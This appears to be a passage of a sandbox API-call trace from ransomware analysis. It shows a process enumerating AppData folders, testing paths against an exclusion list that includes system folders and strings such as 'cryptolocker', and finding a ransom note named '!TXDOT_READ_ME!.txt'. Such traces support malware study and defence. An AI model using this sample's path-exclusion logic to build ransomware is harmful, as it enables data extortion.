0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\TileDataLayer" [0119.244] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 1 [0119.244] StrCmpW (psz1="UNP", psz2=".") returned 1 [0119.244] StrCmpW (psz1="UNP", psz2="..") returned 1 [0119.244] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="UNP", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\system32\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\system\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\UNP" [0119.244] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0119.244] StrCmpW (psz1="VirtualStore", psz2=".") returned 1 [0119.244] StrCmpW (psz1="VirtualStore", psz2="..") returned 1 [0119.244] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.245] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="VirtualStore", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\system32\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\system\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\VirtualStore" [0119.245] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0119.245] FindClose (in: hFindFile=0xec19b0 | out: hFindFile=0xec19b0) returned 1 [0119.245] GetProcessHeap () returned 0xe30000 [0119.245] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.245] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0119.245] StrCmpW (psz1="LocalLow", psz2=".") returned 1 [0119.245] StrCmpW (psz1="LocalLow", psz2="..") returned 1 [0119.245] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0119.245] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0119.245] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="LocalLow", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\system32\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\system\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\local\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\boot\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\perflogs\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\programdata\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\drivers\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\wsus\\") returned 0x0 [0119.245] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="crypt_detect") returned 0x0 [0119.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="cryptolocker") returned 0x0 [0119.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="ransomware") returned 0x0 [0119.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\WINDOWS") returned 0x0 [0119.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\Program Files") returned 0x0 [0119.246] GetProcessHeap () returned 0xe30000 [0119.246] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c2) returned 0xed39f8 [0119.246] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0119.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*" [0119.246] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0119.247] StrCmpW (psz1=".", psz2=".") returned 0 [0119.247] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.247] StrCmpW (psz1="..", psz2=".") returned 1 [0119.247] StrCmpW (psz1="..", psz2="..") returned 0 [0119.247] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7157dbce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0119.247] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0119.247] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0119.247] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0119.247] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0119.247] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Adobe", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe" [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\local\\") returned 0x0 [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Adobe" [0119.247] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x63cde605, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.247] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0119.247] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0119.247] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfdd2edaa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xaf813748, ftLastAccessTime.dwHighDateTime=0x1d5d80b, ftLastWriteTime.dwLowDateTime=0xaf813748, ftLastWriteTime.dwHighDateTime=0x1d5d80b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0119.247] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0119.247] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0119.247] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0119.247] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0119.247] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Mozilla", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla" [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0119.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\local\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Mozilla" [0119.248] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0119.248] StrCmpW (psz1="Sun", psz2=".") returned 1 [0119.248] StrCmpW (psz1="Sun", psz2="..") returned 1 [0119.248] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0119.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0119.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Sun", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\system32\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\system\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\local\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Sun" [0119.248] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0119.248] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0119.248] GetProcessHeap () returned 0xe30000 [0119.248] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.248] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0119.248] StrCmpW (psz1="Roaming", psz2=".") returned 1 [0119.248] StrCmpW (psz1="Roaming", psz2="..") returned 1 [0119.248] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0119.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0119.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Roaming", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\system32\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.248] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\system\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\local\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\boot\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\perflogs\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\programdata\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\drivers\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\wsus\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="crypt_detect") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="cryptolocker") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="ransomware") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\WINDOWS") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.249] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\Program Files") returned 0x0 [0119.249] GetProcessHeap () returned 0xe30000 [0119.249] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xed39f8 [0119.249] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\*") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\*" [0119.249] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec19b0 [0119.249] StrCmpW (psz1=".", psz2=".") returned 0 [0119.249] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.249] StrCmpW (psz1="..", psz2=".") returned 1 [0119.249] StrCmpW (psz1="..", psz2="..") returned 0 [0119.250] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x501e95f1, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x501e95f1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.250] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.250] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.250] StrCpyNW (in: psz1=0xed39f8, 